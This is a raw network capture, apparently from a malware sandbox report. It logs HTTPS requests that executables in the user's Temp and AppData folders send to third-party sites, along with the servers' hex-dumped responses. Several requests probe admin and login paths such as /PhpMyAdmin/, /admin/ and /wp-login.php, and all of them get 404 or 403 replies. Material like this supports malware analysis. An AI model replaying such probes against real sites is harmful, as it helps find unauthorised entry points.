                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 44 70 75 36 66 48 62 59 69 4a 4f 4d 42 4b 69 6f 55 38 6e 44 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sDpu6fHbYiJOMBKioU8nDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                243192.168.2.649728172.66.40.884434632C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC176OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1366INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: warriorplus=giequ27s2rlgl173cf4omrgtg5; expires=Wed, 06-Mar-2024 11:16:13 GMT; Max-Age=2592000; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: rqtok=cc06cf2a2b3b701ce398; expires=Tue, 06-Feb-2024 11:16:13 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC517INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6e 61 5f 6e 65 77 3d 31 3b 20 65 78 70 69 72 65 73 3d 54 75 65 2c 20 30 36 2d 46 65 62 2d 32 30 32 34 20 31 31 3a 31 36 3a 31 34 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 38 36 34 30 30 3b 20 70 61 74 68 3d 2f 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 43 4b 38 47 70 67 47 62 6c 76 74 6d 58 71 4c 6c 76 33 39 4d 51 42 6e 66 50 41 63 37 4f 75 68 55 59 62 43 6a 51 67 4d 32 77 51 44 42 6f 4d 4d 70 43 59 67 79 39 4b 5a 39 55 6a 79 59 63 61 41 74 58 63 6d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: na_new=1; expires=Tue, 06-Feb-2024 11:16:14 GMT; Max-Age=86400; path=/CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CK8GpgGblvtmXqLlv39MQBnfPAc7OuhUYbCjQgM2wQDBoMMpCYgy9KZ9UjyYcaAtXcm
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 33 34 61 36 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 57 61 72 72 69 6f 72 50 6c 75 73 20 7c 20 57 61 72 72 69 6f 72 50 6c 75 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 72 72 69 6f 72 50 6c 75 73 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 72 72 69 6f 72 50 6c 75 73 20 3a 20 59 6f 75 72 20 50 72 6f 66 69 74 20 69 73 20 4f 75 72 20 42 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 34a6<!DOCTYPE html><html lang="en"><head><title>WarriorPlus | WarriorPlus</title><meta property="og:type" content="website"><meta property="og:title" content="WarriorPlus"><meta property="og:site_name" content="WarriorPlus : Your Profit is Our Bu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 44 3a 76 6f 69 64 20 30 2c 73 61 3a 76 6f 69 64 20 30 2c 71 75 65 75 65 54 69 6d 65 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 3a 76 6f 69 64 20 30 2c 74 74 47 75 69 64 3a 76 6f 69 64 20 30 2c 75 73 65 72 3a 76 6f 69 64 20 30 2c 61 63 63 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 61 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: :void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},a={};function s
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 30 2c 6f 62 66 75 73 63 61 74 65 3a 76 6f 69 64 20 30 2c 6a 73 65 72 72 6f 72 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 6d 65 74 72 69 63 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 61 63 74 69 6f 6e 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0,obfuscate:void 0,jserrors:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},metrics:{enabled:!0,autoStart:!0},page_action:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSec
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 7d 7d 2c 70 3d 7b 7d 2c 67 3d 22 41 6c 6c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 67 29 3b 69 66 28 21 70 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 70 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: !0,harvestTimeSeconds:10,autoStart:!0}}},p={},g="All configuration objects require an agent identifier!";function m(e){if(!e)throw new Error(g);if(!p[e])throw new Error("Configuration for ".concat(e," was never set"));return p[e]}function v(e,t){if(!e)thr
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 76 65 72 73 69 6f 6e 3a 53 2e 71 34 2c 64 65 6e 79 4c 69 73 74 3a 76 6f 69 64 20 30 7d 2c 52 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 52 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 52 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ddEventListener,version:S.q4,denyList:void 0},R={};function D(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!R[e])throw new Error("Runtime for ".concat(e," was never set"));return R[e]}function O(e,t){if(!e)throw new Erro
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 30 2e 30 2d 61 6c 70 68 61 2e 31 31 22 7d 2c 33 38 35 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 46 4e 3a 28 29 3d 3e 73 2c 49 46 3a 28 29 3d 3e 75 2c 4e 6b 3a 28 29 3d 3e 66 2c 54 74 3a 28 29 3d 3e 63 2c 5f 41 3a 28 29 3d 3e 6f 2c 63 76 3a 28 29 3d 3e 68 2c 69 53 3a 28 29 3d 3e 61 2c 69 6c 3a 28 29 3d 3e 6e 2c 75 78 3a 28 29 3d 3e 64 2c 76 36 3a 28 29 3d 3e 69 2c 77 31 3a 28 29 3d 3e 6c 7d 29 3b 63 6f 6e 73 74 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0.0-alpha.11"},385:(e,t,r)=>{"use strict";r.d(t,{FN:()=>s,IF:()=>u,Nk:()=>f,Tt:()=>c,_A:()=>o,cv:()=>h,iS:()=>a,il:()=>n,ux:()=>d,v6:()=>i,w1:()=>l});const n="undefined"!=typeof window&&!!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefine
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 64 43 6f 6e 74 65 78 74 2c 69 29 2c 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 6c 65 74 5b 74 2c 72 5d 3d 65 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 69 29 2e 69 6e 63 6c 75 64 65 73 28 74 29 26 26 28 74 68 69 73 2e 73 68 61 72 65 64 43 6f 6e 74 65 78 74 5b 74 5d 3d 72 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 28 30 2c 6e 2e 5a 29 28 22 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 65 64 20 77 68 69 6c 65 20 73 65 74 74 69 6e 67 20 53 68 61 72 65 64 43 6f 6e 74 65 78 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 75 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 6e 3d 72 28 38 33 32 35 29 2c 69 3d 72 28 31 32 38
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: dContext,i),Object.entries(e).forEach((e=>{let[t,r]=e;Object.keys(i).includes(t)&&(this.sharedContext[t]=r)}))}catch(e){(0,n.Z)("An error occured while setting SharedContext",e)}}}},8e3:(e,t,r)=>{"use strict";r.d(t,{L:()=>u,R:()=>c});var n=r(8325),i=r(128
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 66 3d 21 31 3b 74 72 79 7b 66 3d 31 36 3d 3d 3d 72 2e 6c 65 6e 67 74 68 26 26 28 30 2c 6f 2e 4f 50 29 28 72 29 2e 69 73 6f 6c 61 74 65 64 42 61 63 6b 6c 6f 67 7d 63 61 74 63 68 28 65 29 7b 7d 76 61 72 20 68 3d 7b 6f 6e 3a 67 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 67 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 6e 5b 65 5d 3b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 72 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 72 5b 69 5d 3d 3d 3d 74 26 26 72 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 2c 69 2c 6f 29 7b 21 31 21 3d 3d 6f 26 26 28 6f 3d 21 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: },s={},u={},f=!1;try{f=16===r.length&&(0,o.OP)(r).isolatedBacklog}catch(e){}var h={on:g,addEventListener:g,removeEventListener:function(e,t){var r=n[e];if(!r)return;for(var i=0;i<r.length;i++)r[i]===t&&r.splice(i,1)},emit:function(e,r,n,i,o){!1!==o&&(o=!0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 3b 76 61 72 20 61 3d 74 5b 6f 5d 3d 74 5b 6f 5d 7c 7c 7b 7d 3b 28 61 5b 72 5d 3d 61 5b 72 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 65 2c 69 5d 29 7d 7d 2c 33 32 33 39 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 62 50 3a 28 29 3d 3e 73 2c 69 7a 3a 28 29 3d 3e 63 2c 6d 24 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 6e 3d 72 28 33 38 35 29 3b 6c 65 74 20 69 3d 21 31 2c 6f 3d 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 7b 67 65 74 20 70 61 73 73 69 76 65 28 29 7b 72 65 74 75 72 6e 20 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 6f 3d 21 30 2c 21 31 7d 7d 3b 6e 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 6e 2e 5f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ;var a=t[o]=t[o]||{};(a[r]=a[r]||[]).push([e,i])}},3239:(e,t,r)=>{"use strict";r.d(t,{bP:()=>s,iz:()=>c,m$:()=>a});var n=r(385);let i=!1,o=!1;try{const e={get passive(){return i=!0,!1},get signal(){return o=!0,!1}};n._A.addEventListener("test",null,e),n._


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                244192.168.2.649765172.66.43.1174434328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC168OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC763INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                www-authenticate: Basic realm="EnterPassword"
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oX1Wysvm258tZWuiG2lXX4QoiNwYfmvfoY7RCwZAntGRcVj9pC8Ct4G4qdMZ3u3doyd%2FxcZocj5xmiuEZ%2B5%2FKSvK%2FzPJZ2A%2BPSr1aUesYdB0KTGjBjPWOjjF15f4XdE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd710da9b0ee-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC606INData Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC100INData Raw: 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: rbidden</h2><p>Access to this resource on the server is denied!</p></div></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                245192.168.2.650054185.120.71.26443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC178OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=h22ommkr94dg2i4eebha6sl5bj; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
